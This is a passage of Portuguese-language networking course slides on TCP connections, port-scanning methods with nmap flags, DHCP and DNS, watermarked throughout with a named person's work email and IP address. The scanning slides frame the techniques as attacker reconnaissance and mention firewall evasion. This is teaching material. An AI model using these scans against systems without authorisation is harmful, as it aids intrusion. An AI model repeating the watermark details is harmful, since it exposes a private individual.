Cabeçalho TCP (RFC 793) – Opções
Fonte: TCP/IP Illustrated – Volume 1, Richard Stevens, 1ª Edição , Pág: 249
138
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Three-Way Handshake
• Three-Way Handshake é o processo de troca de mensagens para o estabelecimento de uma
conexão TCP.
• Usualmente o software TCP em um host espera passivamente pelo handshake e o software em um
outro host o inicia.
• Contudo, o handshake irá funcionar se ambos os hosts tentarem iniciar uma conexão
simultaneamente.
• O Three-Way Handshake é necessário e suficiente para a correta sincronização entre as duas
extremidades da conexão, evitando problemas de retransmissão e retardo no estabelecimento e
após o fechamento da conexão.
139
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Estabelecimento de Conexão
• O Three-Way Handshake realiza
duas importantes tarefas:
➢ Garante que ambos os lados da
conexão estão prontos para
transferir dados e que ambos os
lados sabem disso;
➢ Permite que ambos os lados da
conexão entre em acordo a
respeito dos números de
sequência iniciais (Initial Sequence
Numbers – ISN).
Fonte: TCP/IP Illustrated – Volume 1, Richard Stevens, 2ª Edição , Pág: 596
140
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Encerramento de Conexão
Fonte: TCP/IP Illustrated – Volume 1, Richard Stevens, 2ª Edição , Pág: 599
• O TCP usa um processo Three-Way
Handshake modificado para encerrar
uma conexão.
• Primeiro, um lado da conexão encerra
a comunicação. Depois de enviar o
restante dos dados é que o outro lado
da conexão encerra sua comunicação.
• Uma vez que uma conexão está
encerrada em uma direção, o TCP
recusa o recebimento de dados vindo
daquela direção. Enquanto isso, dados
podem continuar a fluir na direção
oposta até que o emissário destes
dados encerre a conexão.
141
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Quebra de Conexão
• Algumas vezes condições anormais ocorrem forçando uma aplicação ou software de rede a
abortar uma conexão.
• Para abortar uma conexão, uma das extremidades da conexão envia um segmento com o bit RST
habilitado.
• A outra extremidade da conexão responde imediatamente a solicitação efetuando o aborto de
conexão.
• Uma operação de aborto de conexão significa que a transferência em ambas as direções é
imediatamente terminada e que os recursos utilizados, como os buffers, são liberados.
142
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Principais Portas TCP
Porta Descrição
20 FTP-Data (File Transfer Protocol-Dados)
21 FTP (File Transfer Protocol)
22 SSH (Secure Shell)
23 Telnet
25 SMTP (Simple Mail Transfer Protocol)
80 HTTP (Hypertext Transfer Protocol)
88 Kerberos
110 POP3 (Post Office Protocol)
123 NTP (Network Time Protocol)
143 IMAP (Internet Message Access Protocol )
443 HTTPS (HTTP sobre SSL/TLS)
993 IMAPS (IMAP sobre SSL/TLS)
995 POP3S (POP3 sobre SSL/TLS)
143
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
netstat
• No Windows
➢ n: Não resolve nomes
➢ a: Lista todas as Conexões
➢ b: Exibe o nome do processo
➢ o: ID do processo
➢ p: Indica o protocolo
➢ r: Tabela de Rotas (equivalente a route print)
• No Linux:
➢ p: ID do processo
➢ a: Lista todas as Conexões
➢ n: Não resolve nomes
➢ u: Lista “conexões” UDP
➢t: Lista conexões TCP
➢ r: Tabela de Rotas (equivalente a route -n)
Lista as conexões abertas.
144
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
netstat
145
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
cports
146
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Varredura de Portas (Scanning)
• Port Scanners: Ferramentas utilizadas para a obtenção de informações referentes aos
serviços que são acessíveis e definidas por meio do mapeamento das por TCP e UDP.
➢ O NMAP é um port scanner bastante usado e pode ser utilizado para realizar a
auditoria do firewall e do IDS (Intrusion Detection System).
➢ Alguns port scanners indicam inclusive qual sistema operacional está sendo
executado no alvo.
• Após o mapeamento dos sistemas que podem ser atacados, do sistema operacional
destes e dos serviços que estão sendo executados, as vulnerabilidades específicas para o
sistema operacional e cada serviço serão procuradas por meio de uma varredura
(scanning) de vulnerabilidades.
147
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Métodos de Varredura de Portas (Scanning)
• TCP SYN (Half Open): Esse método não abre uma conexão TCP completa. (Ex: nmap -sS)
Porta Aberta Porta Fechada
1
Atacante (A) Alvo (T)
SYN
O atacante (A) envia um 
pacote SYN ao alvo (T).
2
Atacante (A) Alvo (T)
SYN/ACK
Se T retorna um pacote SYN/ACK, 
então a porta está aberta.
3
Atacante (A) Alvo (T)
RST
Se T retorna um pacote RST para 
fechar o pedido de conexão de A, a 
porta está fechada.
148
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Métodos de Varredura de Portas (Scanning)
• UDP: Esse método envia um pacote UDP para cada porta do alvo. (Ex: nmap -sU)
Porta Aberta Porta Fechada
1
Atacante (A) Alvo (T)
UDP
O atacante (A) envia um 
pacote UDP ao alvo (T).
2
Atacante (A) Alvo (T)
ICMP Port 
Unreachable
Se T retorna uma mensagem 
ICMP Port Unreachable 
(Porta Inalcançável), a porta 
está fechada.
3
Atacante (A) Alvo (T)
Se A não recebe nenhuma 
mensagem, a porta provavelmente 
está aberta e pode ser utilizada 
para o ataque.
149
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Métodos de Varredura de Portas (Scanning)
• TCP FIN: Alguns firewalls são capazes de registrar a chegada de pacotes SYN em
determinadas portas, detectando, assim, o método TCP SYN. Portas fechadas enviam um
pacote RST como resposta a pacotes FIN, enquanto portas abertas ignoram esses pacotes.
(Ex: nmap -sF)
Porta Aberta Porta Fechada
1
Atacante (A) Alvo (T)
FIN
O atacante (A) envia um 
pacote FIN ao alvo (T).
2
Atacante (A) Alvo (T)
RST
Se A recebe um pacote RST de T, 
então a porta está fechada.
3
Atacante (A) Alvo (T)
Se A não recebe nenhum pacote de 
resposta de T, então a porta está 
provavelmente aberta.
150
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Métodos de Varredura de Portas (Scanning)
• Xmas Tree: Os flags FIN, URG e PUSH são utilizados no pacote FIN que é enviado ao
alvo. Esse método não funciona com a plataforma Windows, pois a Microsoft não seguiu
a RFC 973. (Ex: nmap -sX)
Porta Aberta Porta Fechada
2
Atacante (A) Alvo (T)
RST
Se A recebe um pacote RST de T, 
então a porta está fechada.
3
Atacante (A) Alvo (T)
Se A não recebe nenhum pacote de 
resposta de T, então a porta está 
provavelmente aberta.
1
Atacante (A) Alvo (T)
FIN/URG/PSH
O atacante (A) envia um 
pacote FIN com as flags FIN, 
URG e PSH habilitadas ao 
alvo (T).
151
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
DHCP
Dynamic Host 
Configuration Protocol
152
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
DHCP (RFC 2131)
• O protocolo RARP (Reverse Address Resolution Protocol) foi inicialmente desenvolvido para
permitir um computador obter um endereço IP.
• Um protocolo mais genérico chamado BOOTP (Bootstrap Protocol) foi criado para substituir o
protocolo RARP.
• O protocolo DHCP (Dynamic Host Configuration Protocol) foi especificado como sucessor do
protocolo BOOTP.
• Os protocolos BOOTP e DHCP possuem basicamente as mesmas especificações.
153
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
DHCP (RFC 2131)
• O protocolo DHCP utiliza o protocolo UDP (User Datagram Protocol) para transferir
mensagens, portas 67 (Servidor) e 68 (Cliente).
• Por utilizar os protocolos UDP e IP (Internet Protocol), o protocolo DHCP pode ser
implementado como um programa aplicativo.
• Assim como outros protocolos da camada de aplicação o DHCP segue o paradigma
cliente-servidor.
154
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Formas de Implementar o DHCP
• O protocolo DHCP permite 3 tipos de associação de endereços:
➢ Configuração Manual
➢ Configuração Automática ou Autoconfiguração
➢ Configuração Dinâmica
• A associação dinâmica é temporária. Dizemos que o servidor DHCP aluga um endereço para um
cliente por um período finito de tempo. Isso é chamado de “leasing de endereço”.
• O DHCP não especifica um valor constante para o período de leasing.
• Para permitir que um cliente se comunique com um servidor que não esteja na sua mesma rede
local, o DHCP utiliza-se de um relay agent.
155
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DHCP (RFC 2131)
• OPCODE: Especifica qual o tipo de
mensagem encapsulada na área de dados
(Request – 1 ou Reply – 2).
• TIPO DE HARDWARE: Especifica o tipo de
hardware de rede. O valor deste campo para o
Ethernet é 1.
• TAMANHO DO ENDEREÇO DE
HARDWARE: Especifica o tamanho do
endereço de hardware. O valor deste campo
para o Ethernet é 6.
156
0 31168
ID DA TRANSAÇÃO
SEGUNDOS DECORRIDOS FLAGS
ENDEREÇO IP DO CLIENTE
SEU ENDEREÇO IP
ENDEREÇO IP DO SERVIDOR
ENDEREÇO IP DO GATEWAY
CÓDIGO DE OPERAÇÃO 
(OPCODE)
TIPO DE HARDWARE
TAMANHO DO ENDEREÇO 
DE HARDWARE
SALTOS (HOPS)
24
ENDEREÇO DE HARDWARE DO CLIENTE (16 BYTES)
NOME DO SERVIDOR (64 BYTES - OPCIONAL)
ARQUIVO DE INICIALIZAÇÃO (128 BYTES - OPCIONAL)
OPÇÕES (64 BYTES - OPCIONAL)
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DHCP (RFC 2131)
• HOPS: Indica a quantidade de roteadores em
que a mensagem passou até chegar ao
servidor de DHCP. Geralmente o valor deste
campo é zero. Se a mensagem for
encaminhada através de outra rede (utilizando
dhcp relay agent) este campo é incrementado.
• ID DA TRANSAÇÃO: Possui um número
inteiro que os clientes utilizam para combinar
as mensagens de respostas (Reply) com as
mensagens de requisição (Request) dos
clientes.
• SEGUNDOS DECORRIDOS: O número de
segundos desde que o cliente iniciou o
processo de boot.
157
0 31168
ID DA TRANSAÇÃO
SEGUNDOS DECORRIDOS FLAGS
ENDEREÇO IP DO CLIENTE
SEU ENDEREÇO IP
ENDEREÇO IP DO SERVIDOR
ENDEREÇO IP DO GATEWAY
CÓDIGO DE OPERAÇÃO 
(OPCODE)
TIPO DE HARDWARE
TAMANHO DO ENDEREÇO 
DE HARDWARE
SALTOS (HOPS)
24
ENDEREÇO DE HARDWARE DO CLIENTE (16 BYTES)
NOME DO SERVIDOR (64 BYTES - OPCIONAL)
ARQUIVO DE INICIALIZAÇÃO (128 BYTES - OPCIONAL)
OPÇÕES (64 BYTES - OPCIONAL)
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DHCP (RFC 2131)
• FLAGS: Controla como o servidor
enviará a resposta. Via unicast ou
broadcast. Apenas o primeiro bit
deste campo é interpretado, todos os
demais bits são sempre zero.
158
0 31168
ID DA TRANSAÇÃO
SEGUNDOS DECORRIDOS FLAGS
ENDEREÇO IP DO CLIENTE
SEU ENDEREÇO IP
ENDEREÇO IP DO SERVIDOR
ENDEREÇO IP DO GATEWAY
CÓDIGO DE OPERAÇÃO 
(OPCODE)
TIPO DE HARDWARE
TAMANHO DO ENDEREÇO 
DE HARDWARE
SALTOS (HOPS)
24
ENDEREÇO DE HARDWARE DO CLIENTE (16 BYTES)
NOME DO SERVIDOR (64 BYTES - OPCIONAL)
ARQUIVO DE INICIALIZAÇÃO (128 BYTES - OPCIONAL)
OPÇÕES (64 BYTES- OPCIONAL)
ZEROB
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DHCP (RFC 2131)
• ENDEREÇO IP DO CLIENTE: Neste
campo é inserido o endereço IP do cliente,
caso ele o saiba. Este campo será utilizado
pelo cliente em uma mensagem de
solicitação de renovação de seu endereço IP.
• SEU ENDEREÇO IP: O servidor colocará
neste campo o endereço IP que está sendo
ofertado para o cliente.
• ENDEREÇO DE HARDWARE DO
CLIENTE: Endereço de hardware do
cliente.
159
0 31168
ID DA TRANSAÇÃO
SEGUNDOS DECORRIDOS FLAGS
ENDEREÇO IP DO CLIENTE
SEU ENDEREÇO IP
ENDEREÇO IP DO SERVIDOR
ENDEREÇO IP DO GATEWAY
CÓDIGO DE OPERAÇÃO 
(OPCODE)
TIPO DE HARDWARE
TAMANHO DO ENDEREÇO 
DE HARDWARE
SALTOS (HOPS)
24
ENDEREÇO DE HARDWARE DO CLIENTE (16 BYTES)
NOME DO SERVIDOR (64 BYTES - OPCIONAL)
ARQUIVO DE INICIALIZAÇÃO (128 BYTES - OPCIONAL)
OPÇÕES (64 BYTES - OPCIONAL)
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DHCP (RFC 2131)
• ENDEREÇO IP DO
SERVIDOR e NOME DO
SERVIDOR:
Caso estes campos estejam
preenchidos, apenas o servidor que
corresponder a este endereço IP ou
ao nome responderá a requisição.
Estes campos só serão utilizados
em uma mensagem de solicitação
de renovação de endereço IP.
160
0 31168
ID DA TRANSAÇÃO
SEGUNDOS DECORRIDOS FLAGS
ENDEREÇO IP DO CLIENTE
SEU ENDEREÇO IP
ENDEREÇO IP DO SERVIDOR
ENDEREÇO IP DO GATEWAY
CÓDIGO DE OPERAÇÃO 
(OPCODE)
TIPO DE HARDWARE
TAMANHO DO ENDEREÇO 
DE HARDWARE
SALTOS (HOPS)
24
ENDEREÇO DE HARDWARE DO CLIENTE (16 BYTES)
NOME DO SERVIDOR (64 BYTES - OPCIONAL)
ARQUIVO DE INICIALIZAÇÃO (128 BYTES - OPCIONAL)
OPÇÕES (64 BYTES - OPCIONAL)
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DHCP (RFC 2131)
• OPÇÕES: Fornece informações
adicionais para os clientes. Por exemplo,
default gateway e servidor de DNS. É
formato por vários subcampos do tipo
TLV (Type-Lenght-Value), ou seja, cada
opção é formado por um octeto
informando o tipo da opção, um octeto
informando o tamanho da opção e o
valor da opção fornecida.
• ARQUIVO DE INICIALIZAÇÃO:
Utilizado para solicitar um arquivo de
imagem para ser iniciado o boot na
estação.
161
0 31168
ID DA TRANSAÇÃO
SEGUNDOS DECORRIDOS FLAGS
ENDEREÇO IP DO CLIENTE
SEU ENDEREÇO IP
ENDEREÇO IP DO SERVIDOR
ENDEREÇO IP DO GATEWAY
CÓDIGO DE OPERAÇÃO 
(OPCODE)
TIPO DE HARDWARE
TAMANHO DO ENDEREÇO 
DE HARDWARE
SALTOS (HOPS)
24
ENDEREÇO DE HARDWARE DO CLIENTE (16 BYTES)
NOME DO SERVIDOR (64 BYTES - OPCIONAL)
ARQUIVO DE INICIALIZAÇÃO (128 BYTES - OPCIONAL)
OPÇÕES (64 BYTES - OPCIONAL)
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Alocação Dinâmica de IP via DHCP
Cliente Servidor 
DHCP
DHCP Discover1
2DHCP Offer
DHCP Request3
4DHCP Ack
162
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Alocação Dinâmica de IP via DHCP
Fonte: Redes de Computadores e a
Internet, James Kurose, 6ª Edição, Pág: 86
163
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Liberando e Renovando IP (Windows)
164
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Obtendo o Escopo e os Endereços Alocados em um Servidor DHCP Windows
Get-DhcpServerv4Scope -cn <nome/IP servidor>
165
Get-DhcpServerv4Lease -cn <nome/IP servidor> -AllLeases -ScopeId <ID do Escopo>
Get-DhcpServerv4Lease -cn <nome/IP servidor> -AllLeases -ScopeId <ID do Escopo> | ? hostname -match <parte nome host>
Get-DhcpServerv4Lease -cn <nome/IP servidor> -AllLeases -ScopeId <ID do Escopo> | ? ClientID -match ‘<MAC>’
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Liberando e Renovando IP (Linux)
$ dhclient -v -r
Killed old client process
Listening on LPF/eth0/f0:1e:34:11:90:b3
Sending on LPF/eth0/f0:1e:34:11:90:b3
Sending on Socket/fallback
DHCPRELEASE on eth0 to 10.0.0.1 port 67
$ dhclient -v
Listening on LPF/eth0/f0:1e:34:11:90:b3
Sending on LPF/eth0/f0:1e:34:11:90:b3
Sending on Socket/fallback
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 4
DHCPREQUEST of 10.0.0.102 on eth0 to 255.255.255.255 port 67
DHCPOFFER of 10.0.0.102 from 10.0.0.1
DHCPACK of 10.0.0.102 from 10.0.0.1
RTNETLINK answers: File exists
bound to 10.0.0.102 -- renewal in 80408 seconds.
166
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Verificando informações do endereço IP alocado no Linux
167
lease {
interface "ens33";
fixed-address 192.168.3.4;
option subnet-mask 255.255.255.0;
option routers 192.168.3.1;
option dhcp-lease-time 600;
option dhcp-message-type 5;
option domain-name-servers 192.168.3.1,8.8.8.8;
option dhcp-server-identifier 192.168.3.2;
option broadcast-address 192.168.3.255;
option domain-name "MFLAB";
renew 4 2021/08/19 14:47:04;
rebind 4 2021/08/19 14:50:55;
expire 4 2021/08/19 14:52:10;
}
• O endereço IP alocado em um cliente Linux pode ser obtido no arquivo “dhclient.leases“localizado
comumente no diretório:
➢ /var/lib/dhcp
➢ /var/lib/dhcp3
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Obtendo o Escopo e os Endereços Alocados em um Servidor DHCP Linux
168
• O escopo de endereços alocados pode ser obtido no arquivo “dhcpd.leases“ ou “dhcpd6.leases“
localizado comumente no diretório:
• /var/lib/dhcp
• /var/lib/dhcp3
lease 192.168.3.4 {
starts 4 2021/08/19 14:42:10;
ends 4 2021/08/19 14:52:10;
cltt 4 2021/08/19 14:42:10;
binding state active;
next binding state free;
rewind binding state free;
hardware ethernet 00:0c:29:ea:f9:f9;
client-hostname “osboxes";
}
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
DNS
Domain Name System
169
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
DNS (RFC 1035)
• O DNS (Domain Name System) é um banco de dados distribuído que é utilizado por aplicações
TCP/IP para realizar o mapeamento entre nomes de dispositivos (hostnames) e endereços IP, além
de realizar o roteamento de mensagens eletrônicas (e-mails).
• Resolução de Nomes: Mapeamento entre nomes de dispositivos (hostnames) e endereços IP.
• Uma aplicação deve converter um hostname em endereço IP antes de poder enviar um datagrama
utilizando o protocolo UDP ou solicitar ao protocolo TCP a abertura de uma conexão.
• O DNS utiliza o protocolo UDP na porta 53 para realizar as consultas e enviar as respostas a estas
consultas.
• O DNS utiliza o protocolo TCP na porta 53 para realizar a transferência (replicação) de zonas.
170
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
.
arpa
in-addr
10
85
200
edu gov org com
MinhaEmpresa
MinhaFilial
MeuHost
br
com
pt
com
Estrutura do DNS
• O espaço de endereçamento do DNS é uma estrutura hierárquica.
171
Root Servers
MeuHost.MinhaFilial.MinhaEmpresa.com.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Estrutura do DNS
• Cada nó deve ter um rótulo de no máximo 63 caracteres.
• A raiz da árvore é um nó especial que possui rótulo nulo.
• O nome do domínio de qualquer nó corresponde a lista dos rótulos começando no nó, indo até raiz
e utilizando um ponto como separador de rótulos.
• Cada nó na árvore deve ter um único nome de domínio, mas o mesmo rótulo poderá ser usado em
diferentes pontos da árvore.
• Um nome de domínio que termina com um ponto é chamado nome de domínio absoluto ou FQDN
(Fully Qualified Domain Name).
172
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Estrutura do DNS
• Os domínios do nível mais alto são divididos em três áreas:
➢ arpa é um domínio especial usado para mapear endereços IPs em nomes.
➢ Os domínios com três caracteres são chamados domínios genéricos ou domínios
organizacionais.
➢ Todos os domínios com dois caracteres são baseados nos códigos de países encontradosna
especificação ISO 3166 (https://www.iso.org/obp/ui/#search) . Esses domínios são chamados de
domínios de países ou domínios geográficos.
➢ Os domínios de nível mais alto (TLD – Top-Level Domains) permitem tanto a nomeação
baseada em domínios organizacionais (gTLD) quanto em domínios geográficos (ccTLD).
• Uma zona é uma subárvore da árvore DNS que é administrada separadamente.
• Uma típica zona é um domínio de segundo nível.
• Os domínios de segundo nível podem, por sua vez, dividir suas zonas em porções menores.
173
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
https://www.iso.org/obp/ui/#search
Top Level Domains
General 
Top Level Domains
Country Code
Top Level Domains
New General 
Top Level Domains
174
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
New Top Level Domains
Fonte: https://www.name.com/domains
175
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
https://www.name.com/domains
FQDN (Fully Qualified Domain Name)
176
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Root Servers
• Nenhuma entidade centraliza o gerenciamento dos nós da árvore hierárquica do DNS.
• Uma entidade chamada NIC (Network Information Centre) mantém a porção da árvore relacionada
aos domínios de nível mais alto (root servers) e delega responsabilidades para as outras zonas.
• Há 13 servidores raiz distribuídos ao redor do mundo:
➢ 10 nos EUA, 2 na Europa e 1 na Ásia.
➢ Estas instituições recebem um arquivo da zona raiz proposto pela IANA (ICANN - Internet
Corporation for Assigned Names and Numbers) e aprovado pelo governo dos EUA
(Departamento de Comércio).
➢ Uma vez que o conteúdo é aprovado pelo departamento de comércio, ele é integrado ao servidor
raiz mestre operado pela VeriSign.
➢ O arquivo no servidor raiz mestre é automaticamente replicado em todos os outros servidores
raiz.
177
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Root Servers
Hostname Endereços IP Mantenedor
a.root-servers.net 198.41.0.4, 2001:503:ba3e::2:30 VeriSign, Inc.
b.root-servers.net 192.228.79.201, 2001:500:84::b University of Southern California (ISI)
c.root-servers.net 192.33.4.12, 2001:500:2::c Cogent Communications
d.root-servers.net 199.7.91.13, 2001:500:2d::d University of Maryland
e.root-servers.net 192.203.230.10 NASA (Ames Research Center)
f.root-servers.net 192.5.5.241, 2001:500:2f::f Internet Systems Consortium, Inc.
g.root-servers.net 192.112.36.4 US Department of Defense (NIC)
h.root-servers.net 198.97.190.53, 2001:500:1::53 US Army (Research Lab)
i.root-servers.net 192.36.148.17, 2001:7fe::53 Netnod
j.root-servers.net 192.58.128.30, 2001:503:c27::2:30 VeriSign, Inc.
k.root-servers.net 193.0.14.129, 2001:7fd::1 RIPE NCC
l.root-servers.net 199.7.83.42, 2001:500:9f::42 ICANN
m.root-servers.net 202.12.27.33, 2001:dc3::35 WIDE Project
Fonte: https://www.iana.org/domains/root/servers
Fonte: Redes de Computadores e a Internet, James Kurose, 6ª Edição, Pág: 86
178
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
https://www.iana.org/domains/root/servers
Principais Registros (Entradas) no DNS
179
Valor
Tipo do 
Registro
RFC Descrição
1 A 1035 Mapeia um nome a um IPv4.
2 NS 1035 Name Server. Nome do servidor autoritativo/autoritário por uma zona.
5 CNAME 1035 Canonical Name. Alias/apelido para um host registrado no DNS.
6 SOA 1035
Start of Authority. Fornece informações autoritativas da zona: servidores
de nome, e-mail de contato, número serial, temporizadores da
transferência de zona.
12 PTR 1035 Mapeia um IP a um nome. in-addr.arpa (IPv4) / ip6.arpa (IPv6)
15 MX 1035 Mail Exchanger. Fornece o nome do servidor de e-mail do domiínio.
16 TXT
1035
1464
Text. Fornece uma variedade de informações, por exemplo, SPF (Sender 
Policy Framework ) para esquema anti-spam.
28 AAAA 3596 Mapeia um nome a um IPv6.
33 SRV 2782 Indica o servidor responsável por um dado serviço.
251 IXFR 1995 Transferência de zona incremental.
252 AXFR
1035
5936
Transferência de zona total. Utiliza o TCP.
255 ANY 1035 Solicita todos os registros do DNS.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Resolução de Nomes DNS
Root Servers
(Servidores raiz)
Cliente
(Resolver)
Passo 2
Qual o IP de 
www.xyz.com.br?
Passo 1
Cache Cache
Pa
ss
o 3
Vo
cê
 sa
be
 qu
al 
o I
P 
de
 w
ww
.xy
z.c
om
.br
?
Servidor
DNS
Pa
ss
o 4
Nã
o! 
Te
nte
 os
 
se
rvi
do
res
 D
NS
 .b
r
Servidores .br
Servidores 
.com.br
Servidores 
xyz.com.br
Passo 5
Você sabe qual o IP 
de www.xyz.com.br?
Passo 6
Não! Tente os 
servidores DNS .com.br
Passo 7
Você sabe qual o IP 
de www.xyz.com.br?Passo 8
Não! Tente os 
servidores DNS 
xyz.com.br
P
a
s
s
o
 9
V
o
cê
 s
a
b
e
 q
u
a
l o
 I
P
 
d
e
 w
w
w
.x
yz
.c
o
m
.b
r?
P
a
s
s
o
 1
0
S
im
! 
O
 I
P
 d
e
 
w
w
w
.x
yz
.c
o
m
.b
r 
é
 2
0
0
.2
5
3
.1
.1
Passo 11
O IP de 
www.xyz.com.br é 
200.253.1.1
180
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DNS (RFC 1035)
181
0 3116
NÚMERO DE SERVIDORES AUTORITATIVOS NÚMERO DE INFORMAÇÕES ADICIONAIS
SEÇÃO DE CONSULTA
...
SEÇÃO DE RESPOSTA
...
SEÇÃO DE SERVIDORES AUTORITATIVOS
...
SEÇÃO DE INFORMAÇÕES ADICIONAIS
...
IDENTIFICAÇÃO PARÂMETRO
NÚMERO DE CONSULTAS NÚMERO DE RESPOSTAS
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DNS – Campo Parâmetro (RFC 1035)
• QR (Query/Response):
0: a mensagem é uma consulta.
1: a mensagem é uma resposta.
• OPCODE:
0: standard query (Consulta Padrão)
1: inverse query (Consulta Reversa)
2: server status request
4: DNS NOTIFY (Notificação)
5: DNS UPDATE (Atualização)
182
1
QR CÓDIGO DE OPERAÇÃO (OPCODE) AA TC RD RA ZERO CÓDIGO DE RESPOSTA (RCODE)
1 1 1 14 43
0 3116
NÚMERO DE SERVIDORES AUTORITATIVOS NÚMERO DE INFORMAÇÕES ADICIONAIS
SEÇÃO DE CONSULTA
...
SEÇÃO DE RESPOSTA
...
SEÇÃO DE SERVIDORES AUTORITATIVOS
...
SEÇÃO DE INFORMAÇÕES ADICIONAIS
...
IDENTIFICAÇÃO PARÂMETRO
NÚMERO DE CONSULTAS NÚMERO DE RESPOSTAS
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DNS – Campo Parâmetro (RFC 1035)
• AA: Significa Authoritative answer.
Se estiver habilitado significa que o
servidor de nomes em questão é
autorizado para a zona.
• TC: Significa truncated. Utilizado
com o protocolo UDP significa que o
tamanho total da resposta excedeu
512 bytes e apenas os primeiros 512
serão retornados.
183
1
QR CÓDIGO DE OPERAÇÃO (OPCODE) AA TC RD RA ZERO CÓDIGO DE RESPOSTA (RCODE)
1 1 1 14 43
0 3116
NÚMERO DE SERVIDORES AUTORITATIVOS NÚMERO DE INFORMAÇÕES ADICIONAIS
SEÇÃO DE CONSULTA
...
SEÇÃO DE RESPOSTA
...
SEÇÃO DE SERVIDORES AUTORITATIVOS
...
SEÇÃO DE INFORMAÇÕES ADICIONAIS
...
IDENTIFICAÇÃO PARÂMETRO
NÚMERO DE CONSULTAS NÚMERO DE RESPOSTAS
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho DNS – Campo Parâmetro (RFC 1035)
• RD: Significa recursion desired. Se
estiver habilitado significa que o servidor
de nomes deverá processar a consulta
como uma consulta recursiva (recursive
query). Se não estiver habilitado e o
servidor de nomes consultado não tiver
uma resposta para a consulta, o mesmo
retornará ao cliente uma lista de outros
servidores de nomes a serem contatados
em busca de uma resposta para a consulta.
Isso é chamado consulta interativa.
184
1
QR CÓDIGO DE OPERAÇÃO (OPCODE) AA TC RD RA ZERO CÓDIGO DE RESPOSTA (RCODE)
1 1 1 14 43
0 3116
NÚMERO DE SERVIDORES AUTORITATIVOS NÚMERO DE INFORMAÇÕES ADICIONAIS
SEÇÃO DE CONSULTA
...
SEÇÃO DE RESPOSTA
...
SEÇÃO DE SERVIDORES AUTORITATIVOS
...
SEÇÃO DE INFORMAÇÕES ADICIONAIS
...
IDENTIFICAÇÃO PARÂMETRO
NÚMERO DE CONSULTAS NÚMERO DE RESPOSTAS
